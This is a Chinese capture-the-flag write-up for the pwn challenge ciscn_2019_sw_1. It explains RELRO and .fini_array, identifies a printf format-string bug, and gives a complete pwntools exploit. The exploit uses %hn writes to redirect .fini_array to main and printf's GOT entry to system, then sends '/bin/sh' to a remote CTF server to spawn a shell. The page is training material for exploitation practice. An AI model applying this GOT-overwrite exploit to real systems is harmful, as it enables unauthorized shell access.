ciscn_2019_sw_1 Writeup

前提

  • RELRO防御策略是当RELRO保护:
    • 为NO RELRO的时候,init.arrayfini.arraygot.plt均可读可写
    • 为PARTIAL RELRO的时候,ini.arrayfini.array可读不可写,got.plt可读可写
    • 为FULL RELRO时,init.arrayfini.arraygot.plt均可读不可写。
  • linux程序运行时:
    • 在加载的时候,会依次调用init.array数组中的每一个函数指针
    • 在结束的时候,依次调用fini.array中的每一个函数指针。
  • 当程序出现格式化字符串漏洞,但是至少需要写两次才能完成攻击。
    • 当少于两个输入点时,可以考虑改写fini.array中的函数指针为main函数地址,可以再执行一次main函数。
    • 一般来说,这个数组的长度为1,也就是说只能写一个地址。[1]

程序逻辑

  • 设置了数组存储上限char format[68];且输入限制为__isoc99_scanf("%64s", format);
    • 不存在越界输入。
    • 输入的字符串只有64个字符。
  • 存在输入字符串直接输出的情况printf(format);。可能存在格式化字符漏洞。
  • 存在函数_sys,返回了return system(command);

思路

  • .fini_array覆盖为main,使得程序结束后可以再次重新启用。
  • printf_got覆盖为system_plt,使得第二次使用本程序中,跳转到printf()这一步时等效于执行system()。输入的参数即为system()的参数。
  • 几个地址:
    • system().plt = 0x080483D0
    • fini_array = 0x0804979C
    • printf.got = 0x0804989C
    • main() = 0x08048534
from pwn import *
context.log_level = "debug"

io = remote("node3.buuoj.cn",28414)
elf = ELF("./sw_1_ciscn_2019")

fini_array = 0x0804979C
printf_got = 0x0804989C

payload = p32(fini_array+2) + p32(printf_got+2) 
payload += p32(printf_got) + p32(fini_array)
payload += "%"+str(0x0804-0x10)+"c" + "%4$hn"
payload += "%5$hn"
payload += "%"+str(0x83D0-0x0804)+"c" + "%6$hn"
payload += "%"+str(0x8534-0x83D0)+"c" + "%7$hn"


io.sendlineafter("Welcome to my ctf! What's your name?\n",payload)
io.sendlineafter("Welcome to my ctf! What's your name?\n","/bin/sh\x00")
io.interactive()

[1] 参考自 LynneHuan,ciscn_2019_sw_1 https://www.cnblogs.com/LynneHuan/p/14660529.html

  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值